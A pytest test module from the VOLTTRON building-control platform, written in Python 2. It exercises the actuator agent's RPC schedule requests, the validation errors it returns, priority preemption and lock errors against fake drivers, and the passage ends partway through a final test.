# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
"""
Pytest test cases for testing actuator agent using rpc calls.
"""
from datetime import datetime, timedelta
import gevent
import gevent.subprocess as subprocess
import pytest
from gevent.subprocess import Popen
from mock import MagicMock
from volttron.platform.jsonrpc import RemoteError
from volttron.platform.messaging import topics
REQUEST_CANCEL_SCHEDULE = 'request_cancel_schedule'
REQUEST_NEW_SCHEDULE = 'request_new_schedule'
PLATFORM_ACTUATOR = 'platform.actuator'
TEST_AGENT = 'test-agent'
PRIORITY_LOW = 'LOW'
SUCCESS = 'SUCCESS'
FAILURE = 'FAILURE'
@pytest.fixture(scope="module")
def publish_agent(request, volttron_instance1):
"""
Fixture used for setting up the environment.
1. Creates fake driver configs
2. Starts the master driver agent with the created fake driver agents
3. Starts the actuator agent
4. Creates an instance Agent class for publishing and returns it
:param request: pytest request object
:param volttron_instance1: instance of volttron in which test cases are run
:return: an instance of fake agent used for publishing
"""
# Create master driver config and 2 fake devices each with 6 points
process = Popen(['python', 'config_builder.py', '--count=4',
'--publish-only-depth-all', 'fake',
'fake_unit_testing.csv', 'null'],
env=volttron_instance1.env,
cwd='scripts/scalability-testing',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
result = process.wait()
print result
assert result == 0
# Start the master driver agent which would intern start the fake driver
# using the configs created above
master_uuid = volttron_instance1.install_agent(
agent_dir="services/core/MasterDriverAgent",
config_file="scripts/scalability-testing/configs/master-driver.agent",
start=True)
print("agent id: ", master_uuid)
gevent.sleep(2) # wait for the agent to start and start the devices
# Start the actuator agent through which publish agent should communicate
# to fake device. Start the master driver agent which would intern start
# the fake driver using the configs created above
actuator_uuid = volttron_instance1.install_agent(
agent_dir="services/core/ActuatorAgent",
config_file="services/core/ActuatorAgent/tests/actuator.config",
start=True)
print("agent id: ", actuator_uuid)
# 3: Start a fake agent to publish to message bus
publish_agent = volttron_instance1.build_agent()
# 4: add a tear down method to stop sqlhistorian agent and the fake agent
# \that published to message bus
def stop_agent():
print("In teardown method of module")
volttron_instance1.stop_agent(actuator_uuid)
volttron_instance1.stop_agent(master_uuid)
publish_agent.core.stop()
request.addfinalizer(stop_agent)
return publish_agent
@pytest.fixture(scope="function")
def cancel_schedules(request, publish_agent):
"""
Fixture used to clean up after every test case.
Fixture used to clean up after every test case. Cancels any active
schedules used for a test case so that the same device and time slot can
be used for the next test case
:param request: pytest request object
:param publish_agent: instance Agent class for doing the rpc calls
:return: Array object that the test methods populates with list of tasks
that needs to be cancelled after test. Will contain list of dictionary
objects of the format ({'agentid': agentid, 'taskid': taskid})
"""
cleanup_parameters = []
def cleanup():
for schedule in cleanup_parameters:
print('Requesting cancel for task:', schedule['taskid'],
'from agent:', schedule['agentid'])
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_CANCEL_SCHEDULE,
schedule['agentid'],
schedule['taskid']).get(timeout=10)
# sleep so that the message is sent to pubsub before next
gevent.sleep(1)
# test monitors callback method calls
print ("result of cancel ", result)
request.addfinalizer(cleanup)
return cleanup_parameters
@pytest.fixture(scope="function")
def revert_devices(request, publish_agent):
"""
Cleanup method to revert points on device after test run
:param request: pytest request object
:param publish_agent: instance Agent class for doing the rpc calls
:return: Array object that the test methods populates with list of points
that needs to be reverted after test. Will contain list of dictionary
objects of the format ({'agentid': agentid, 'device': point_to_revert})
"""
cleanup_parameters = []
def cleanup():
for device in cleanup_parameters:
print(
'Requesting revert on device:', device['device'], 'from agent:',
device['agentid'])
publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR, # Target agent
'revert_device', # Method
device['agentid'], # Requestor
device['device'] # Point to revert
).get(timeout=10)
# sleep so that the message is sent to pubsub before next test
# monitors callback method calls
gevent.sleep(1)
request.addfinalizer(cleanup)
return cleanup_parameters
@pytest.mark.actuator
def test_schedule_success(publish_agent, cancel_schedules):
"""
Test responses for successful schedule request
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end of
test so that other tests can use the same device and time slot
"""
print ("\n**** test_schedule_success ****")
# used by cancel_schedules
agentid = TEST_AGENT
taskid = 'task_schedule_success'
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=1))
msg = [
['fakedriver0', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
@pytest.mark.actuator
def test_schedule_error_int_taskid(publish_agent):
"""
Test responses for successful schedule request with integer task id
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
"""
print ("\n**** test_schedule_error_int_taskid ****")
agentid = TEST_AGENT
taskid = 1234
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=1))
msg = [
['fakedriver1', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == FAILURE
assert result['info'] == \
'MALFORMED_REQUEST: TypeError: taskid must be a nonempty string'
@pytest.mark.actuator
def test_schedule_error_int_agentid(publish_agent):
"""
Test responses for successful schedule request with integer agent id
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
"""
print ("\n**** test_schedule_error_int_agentid ****")
agentid = 1234
taskid = 'task_schedule_int_agentid'
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=1))
msg = [
['fakedriver1', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == FAILURE
assert result['info'] == \
'MALFORMED_REQUEST: TypeError: agentid must be a nonempty string'
@pytest.mark.actuator
def test_schedule_empty_taskid(publish_agent, cancel_schedules):
"""
Test responses for successful schedule request when task id is an empty
string
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end
of test so that other tests can use the same device and time slot
"""
print ("\n**** test_schedule_empty_taskid ****")
# used by cancel_schedules
agentid = TEST_AGENT
taskid = ''
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=1))
msg = [
['fakedriver1', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == FAILURE
assert result['info'] == \
'MALFORMED_REQUEST: TypeError: taskid must be a nonempty string'
@pytest.mark.actuator
def test_schedule_empty_agentid(publish_agent, cancel_schedules):
"""
Test responses for successful schedule request when agent id is an
empty string
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end
of test so that other tests can use the same device and time slot
"""
print ("\n**** test_schedule_empty_agentid ****")
# used by cancel_schedules
agentid = ''
taskid = 'task_empty_str_agent'
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=1))
msg = [
['fakedriver0', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == FAILURE
assert result['info'] == \
'MALFORMED_REQUEST: TypeError: agentid must be a nonempty string'
@pytest.mark.actuator
def test_schedule_error_none_taskid(publish_agent):
"""
Test error responses for schedule request with taskid = None
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
"""
print ("\n**** test_schedule_error_none_taskid ****")
agentid = TEST_AGENT
taskid = None
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=1))
msg = [
['fakedriver1', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
print result
assert result['result'] == FAILURE
assert result['info'] == 'MISSING_TASK_ID'
@pytest.mark.actuator
def test_schedule_error_none_agentid(publish_agent):
"""
Test error responses for schedule request with agentid = None
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
"""
print ("\n**** test_schedule_error_none_agentid ****")
agentid = None
taskid = 'task_none_agentid'
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=1))
msg = [
['fakedriver0', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == FAILURE
assert result['info'] == 'MISSING_AGENT_ID'
@pytest.mark.actuator
def test_schedule_error_invalid_priority(publish_agent):
"""
Test error responses for schedule request with an invalid priority
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
"""
print ("\n**** test_schedule_error_invalid_priority ****")
taskid = 'task_invalid_priority'
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=1))
msg = [
['fakedriver1', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
TEST_AGENT,
taskid,
'LOW2',
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == FAILURE
assert result['info'] == 'INVALID_PRIORITY'
@pytest.mark.actuator
def test_schedule_error_empty_message(publish_agent):
"""
Test error responses for schedule request with an empty message
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
"""
print ("\n**** test_schedule_error_empty_message ****")
taskid = 'task_empty_message'
msg = [
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
TEST_AGENT,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == FAILURE
assert result['info'] == 'MALFORMED_REQUEST_EMPTY'
@pytest.mark.actuator
def test_schedule_error_duplicate_task(publish_agent, cancel_schedules):
"""
Test error responses for schedule request with task id that is already
in use
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end
of test so that other tests can use the same device and time slot
"""
print ("\n**** test_schedule_error_duplicate_task ****")
# used by cancel_schedules
agentid = TEST_AGENT
taskid = 'task_schedule_duplicate_id'
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=1))
msg = [
['fakedriver1', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
assert result['result'] == SUCCESS
# new request with same task id
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == FAILURE
assert result['info'] == 'TASK_ID_ALREADY_EXISTS'
@pytest.mark.actuator
def test_schedule_error_none_priority(publish_agent):
"""
Test error responses for schedule request with priority = None
:param publish_agent: fixture invoked to setup all agents necessary
and returns an instance of Agent object used for publishing
"""
print ("\n**** test_schedule_error_none_priority ****")
taskid = 'task_none_priority'
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=1))
msg = [
['fakedriver0', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
TEST_AGENT,
taskid,
None,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == FAILURE
assert result['info'] == 'MISSING_PRIORITY'
@pytest.mark.actuator
def test_schedule_error_malformed_request(publish_agent):
"""
Test error responses for schedule request with malformed request -
request with only a device name and start time and no stop time
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
"""
print ("\n**** test_schedule_error_malformed_request ****")
taskid = 'task_malformed_request'
start = str(datetime.now())
# end = str(datetime.now() + timedelta(seconds=1))
msg = [
['fakedriver0', start]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
TEST_AGENT,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == FAILURE
assert result['info'].startswith('MALFORMED_REQUEST')
@pytest.mark.actuator
def test_schedule_premept_self(publish_agent, cancel_schedules):
"""
Test error response for schedule request through pubsub.
Test schedule preemption by a higher priority task from the same agent.
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end
of test so that other tests can use the same device and time slot
"""
print ("\n**** test_schedule_premept_self ****")
# used by cancel_schedules
agentid = TEST_AGENT
taskid = 'task_high_priority'
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
# add low prority task as well since it won't get cancelled till
# end of grace time
cancel_schedules.append(
{'agentid': agentid, 'taskid': 'task_low_priority'})
publish_agent.callback = MagicMock(name="callback")
publish_agent.callback.reset_mock()
# subscribe to schedule response topic
publish_agent.vip.pubsub.subscribe(peer='pubsub',
prefix=topics.ACTUATOR_SCHEDULE_RESULT,
callback=publish_agent.callback).get()
start = str(datetime.now() + timedelta(seconds=10))
end = str(datetime.now() + timedelta(seconds=20))
msg = [
['fakedriver1', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
'task_low_priority',
'LOW_PREEMPT',
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
# wait for above call's success response to publish_agent.callback method
gevent.sleep(1)
publish_agent.callback.reset_mock()
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
'HIGH',
msg).get(timeout=10)
assert result['result'] == SUCCESS
# wait for 2 callbacks - success msg for task_high_priority and preempt
# msg for task_low_priority
gevent.sleep(6)
print ('call args list:', publish_agent.callback.call_args_list)
assert publish_agent.callback.call_count == 2
# Grab the args of callback and verify
call_args1 = publish_agent.callback.call_args_list[0][0]
call_args2 = publish_agent.callback.call_args_list[1][0]
assert call_args1[1] == PLATFORM_ACTUATOR
assert call_args1[3] == topics.ACTUATOR_SCHEDULE_RESULT
# initialize 0 to schedule response and 1 to cancel response
schedule_header = call_args1[4]
schedule_message = call_args1[5]
cancel_header = call_args2[4]
cancel_message = call_args2[5]
# check if order is reversed: 0 is cancelresponse and 1 is new schedule
if call_args1[4]['type'] == 'CANCEL_SCHEDULE':
assert call_args2[4]['type'] == 'NEW_SCHEDULE'
cancel_header = call_args1[4]
cancel_message = call_args1[5]
schedule_header = call_args2[4]
schedule_message = call_args2[5]
else:
assert call_args1[4]['type'] == 'NEW_SCHEDULE'
assert call_args2[4]['type'] == 'CANCEL_SCHEDULE'
# values remain as initialized above if/else
assert schedule_header['type'] == 'NEW_SCHEDULE'
assert schedule_header['taskID'] == taskid
assert schedule_header['requesterID'] == TEST_AGENT
assert schedule_message['result'] == SUCCESS
assert cancel_header['taskID'] == 'task_low_priority'
assert cancel_message['data']['agentID'] == TEST_AGENT
assert cancel_message['data']['taskID'] == taskid
assert cancel_message['result'] == 'PREEMPTED'
@pytest.mark.actuator
def test_schedule_premept_active_task(publish_agent, cancel_schedules):
"""
Test error response for schedule request.
Test schedule preemption of a actively running task with priority
LOW_PREEMPT by a higher priority task from the a different agent.
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end
of test so that other tests can use the same device and time slot
"""
print ("\n**** test_schedule_premept_active_task ****")
# used by cancel_schedules
agentid = 'new_agent'
taskid = 'task_high_priority2'
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
# add low prority task as well since it won't get cancelled till
# end of grace time
cancel_schedules.append(
{'agentid': TEST_AGENT, 'taskid': 'task_low_priority2'})
publish_agent.callback = MagicMock(name="callback")
publish_agent.callback.reset_mock()
# subscribe to schedule response topic
publish_agent.vip.pubsub.subscribe(peer='pubsub',
prefix=topics.ACTUATOR_SCHEDULE_RESULT,
callback=publish_agent.callback).get()
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=15))
msg = [
['fakedriver1', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
TEST_AGENT,
'task_low_priority2',
'LOW_PREEMPT',
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
# wait for above call's success response to publish_agent.callback method
gevent.sleep(1)
publish_agent.callback.reset_mock()
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
'HIGH',
msg).get(timeout=10)
assert result['result'] == SUCCESS
# wait for 2 callbacks - success msg for task_high_priority and preempt
# msg for task_low_priority
gevent.sleep(6)
print ('call args list:', publish_agent.callback.call_args_list)
assert publish_agent.callback.call_count == 2
# Grab the args of callback and verify
call_args1 = publish_agent.callback.call_args_list[0][0]
call_args2 = publish_agent.callback.call_args_list[1][0]
assert call_args1[1] == PLATFORM_ACTUATOR
assert call_args1[3] == topics.ACTUATOR_SCHEDULE_RESULT
# initialize 0 to schedule response and 1 to cancel response
schedule_header = call_args1[4]
schedule_message = call_args1[5]
print ("call args of 1 ", publish_agent.callback.call_args_list[1])
cancel_header = call_args2[4]
cancel_message = call_args2[5]
# check if order is reversed: 0 is cancelresponse and 1 is new schedule
if call_args1[4]['type'] == 'CANCEL_SCHEDULE':
assert call_args2[4]['type'] == 'NEW_SCHEDULE'
cancel_header = call_args1[4]
cancel_message = call_args1[5]
schedule_header = call_args2[4]
schedule_message = call_args2[5]
else:
assert call_args1[4]['type'] == 'NEW_SCHEDULE'
assert call_args2[4]['type'] == 'CANCEL_SCHEDULE'
# values remain as initialized above if/else
assert schedule_header['type'] == 'NEW_SCHEDULE'
assert schedule_header['taskID'] == taskid
assert schedule_header['requesterID'] == agentid
assert schedule_message['result'] == SUCCESS
assert cancel_header['taskID'] == 'task_low_priority2'
assert cancel_message['data']['agentID'] == agentid
assert cancel_message['data']['taskID'] == taskid
assert cancel_message['result'] == 'PREEMPTED'
@pytest.mark.actuator
def test_schedule_premept_active_task_gracetime(publish_agent,
cancel_schedules):
"""
Test error response for schedule request.
Test schedule preemption of a actively running task with priority LOW by
a higher priority task from the a different agent. Try setting a point
before the end of grace time of lower priority task. set operation should
fail
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end
of test so that other tests can use the same device and time slot
"""
print ("\n**** test_schedule_premept_active_task_gracetime ****")
# used by cancel_schedules
agentid = 'new_agent'
taskid = 'task_high_priority3'
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
# add low prority task as well since it won't get cancelled till
# end of grace time
cancel_schedules.append(
{'agentid': TEST_AGENT, 'taskid': 'task_low_priority3'})
publish_agent.callback = MagicMock(name="callback")
publish_agent.callback.reset_mock()
# subscribe to schedule response topic
publish_agent.vip.pubsub.subscribe(peer='pubsub',
prefix=topics.ACTUATOR_SCHEDULE_RESULT,
callback=publish_agent.callback).get()
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=20))
msg = [
['fakedriver1', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
TEST_AGENT,
'task_low_priority3',
'LOW_PREEMPT',
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
# wait for above call's success response to publish_agent.callback method
gevent.sleep(1)
publish_agent.callback.reset_mock()
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
'HIGH',
msg).get(timeout=10)
assert result['result'] == SUCCESS
# wait for 2 callbacks - success msg for task_high_priority and preempt
# msg for task_low_priority
gevent.sleep(6)
print ('call args list:', publish_agent.callback.call_args_list)
assert publish_agent.callback.call_count == 2
# Grab the args of callback and verify
call_args1 = publish_agent.callback.call_args_list[0][0]
call_args2 = publish_agent.callback.call_args_list[1][0]
assert call_args1[1] == PLATFORM_ACTUATOR
assert call_args1[3] == topics.ACTUATOR_SCHEDULE_RESULT
# initialize 0 to schedule response and 1 to cancel response
schedule_header = call_args1[4]
schedule_message = call_args1[5]
cancel_header = call_args2[4]
cancel_message = call_args2[5]
# check if order is reversed: 0 is cancelresponse and 1 is new schedule
if call_args1[4]['type'] == 'CANCEL_SCHEDULE':
assert call_args2[4]['type'] == 'NEW_SCHEDULE'
cancel_header = call_args1[4]
cancel_message = call_args1[5]
schedule_header = call_args2[4]
schedule_message = call_args2[5]
else:
assert call_args1[4]['type'] == 'NEW_SCHEDULE'
assert call_args2[4]['type'] == 'CANCEL_SCHEDULE'
# values remain as initialized above if/else
assert schedule_header['type'] == 'NEW_SCHEDULE'
assert schedule_header['taskID'] == taskid
assert schedule_header['requesterID'] == agentid
assert schedule_message['result'] == SUCCESS
assert cancel_header['taskID'] == 'task_low_priority3'
assert cancel_message['data']['agentID'] == agentid
assert cancel_message['data']['taskID'] == taskid
assert cancel_message['result'] == 'PREEMPTED'
# High priority task's schedule request should succeed but it should not
# be able to start write to the device till active task's (
# 'task_low_priority3') grace time is over
try:
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR, # Target agent
'set_point', # Method
agentid, # Requestor
'fakedriver1/SampleWritableFloat1', # Point to set
2.5 # New value
).get(timeout=10)
pytest.fail('Expecting LockError. Code returned: {}'.format(result))
except RemoteError as e:
assert e.exc_info['exc_type'] == 'actuator.agent.LockError'
assert e.message == 'caller ({}) does not have this lock'.format(
agentid)
@pytest.mark.actuator
def test_schedule_premept_error_active_task(publish_agent, cancel_schedules):
"""
Test error response for schedule request.
Test schedule preemption of a actively running task with priority LOW by
a higher priority task from the a different agent. It should fail as the
LOW priority task's time window is active
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end
of test so that other tests can use the same device and time slot
"""
print ("\n**** test_schedule_premept_error_active_task ****")
# used by cancel_schedules
agentid = TEST_AGENT
taskid = 'task_low_priority3'
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
publish_agent.callback = MagicMock(name="callback")
publish_agent.callback.reset_mock()
# subscribe to schedule response topic
publish_agent.vip.pubsub.subscribe(peer='pubsub',
prefix=topics.ACTUATOR_SCHEDULE_RESULT,
callback=publish_agent.callback).get()
start = str(datetime.now())
end = str(datetime.now() + timedelta(seconds=10))
msg = [
['fakedriver1', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
PRIORITY_LOW,
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
# wait for above call's success response to publish_agent.callback method
gevent.sleep(1)
publish_agent.callback.reset_mock()
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
'failed_high_priority_task',
'HIGH',
msg).get(timeout=10)
assert result['result'] == FAILURE
assert result['info'] == 'CONFLICTS_WITH_EXISTING_SCHEDULES'
assert result['data'][TEST_AGENT].keys()[0] == taskid
@pytest.mark.actuator
def test_schedule_premept_future_task(publish_agent, cancel_schedules):
"""
Test error response for schedule request.
Test schedule preemption of a future task with priority LOW by a higher
priority task from the a different agent.
:param publish_agent: fixture invoked to setup all agents necessary and
returns an instance of Agent object used for publishing
:param cancel_schedules: fixture used to cancel the schedule at the end
of test so that other tests can use the same device and time slot
"""
print ("\n**** test_schedule_premept_future_task ****")
# used by cancel_schedules
agentid = 'new_agent'
taskid = 'task_high_priority4'
cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
# add low prority task as well since it won't get cancelled till end of
# grace time
cancel_schedules.append(
{'agentid': TEST_AGENT, 'taskid': 'task_low_priority4'})
publish_agent.callback = MagicMock(name="callback")
publish_agent.callback.reset_mock()
# subscribe to schedule response topic
publish_agent.vip.pubsub.subscribe(peer='pubsub',
prefix=topics.ACTUATOR_SCHEDULE_RESULT,
callback=publish_agent.callback).get()
start = str(datetime.now() + timedelta(seconds=10))
end = str(datetime.now() + timedelta(seconds=20))
msg = [
['fakedriver2', start, end]
]
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
TEST_AGENT,
'task_low_priority4',
'LOW',
msg).get(timeout=10)
# expected result {'info': u'', 'data': {}, 'result': SUCCESS}
print result
assert result['result'] == SUCCESS
# wait for above call's success response to publish_agent.callback method
gevent.sleep(1)
publish_agent.callback.reset_mock()
result = publish_agent.vip.rpc.call(
PLATFORM_ACTUATOR,
REQUEST_NEW_SCHEDULE,
agentid,
taskid,
'HIGH',
msg).get(timeout=10)
assert result['result'] == SUCCESS
# wait for 2 callbacks - success msg for task_high_priority and preempt
# msg for task_low_priority
gevent.sleep(6)
print ('call args list:', publish_agent.callback.call_args_list)
assert publish_agent.callback.call_count == 2
# Grab the args of callback and verify
call_args1 = publish_agent.callback.call_args_list[0][0]
call_args2 = publish_agent.callback.call_args_list[1][0]
assert call_args1[1] == PLATFORM_ACTUATOR
assert call_args1[3] == topics.ACTUATOR_SCHEDULE_RESULT
# initialize 0 to schedule response and 1 to cancel response
schedule_header = call_args1[4]
schedule_message = call_args1[5]
print ("call args of 1 ", publish_agent.callback.call_args_list[1])
cancel_header = call_args2[4]
cancel_message = call_args2[5]
# check if order is reversed: 0 is cancelresponse and 1 is new schedule
if call_args1[4]['type'] == 'CANCEL_SCHEDULE':
assert call_args2[4]['type'] == 'NEW_SCHEDULE'
cancel_header = call_args1[4]
cancel_message = call_args1[5]
schedule_header = call_args2[4]
schedule_message = call_args2[5]
else:
assert call_args1[4]['type'] == 'NEW_SCHEDULE'
assert call_args2[4]['type'] == 'CANCEL_SCHEDULE'
# values remain as initialized above if/else
assert schedule_header['type'] == 'NEW_SCHEDULE'
assert schedule_header['taskID'] == taskid
assert schedule_header['requesterID'] == agentid
assert schedule_message['result'] == SUCCESS
assert cancel_header['taskID'] == 'task_low_priority4'
assert cancel_message['data']['agentID'] == agentid
assert cancel_message['data']['taskID'] == taskid
assert cancel_message['result'] == 'PREEMPTED'
@pytest.mark.actuator
def test_schedule_conflict_self(publish_agent):
"""
Test error response for schedule request. Test schedule with conflicting
time slots in the same request
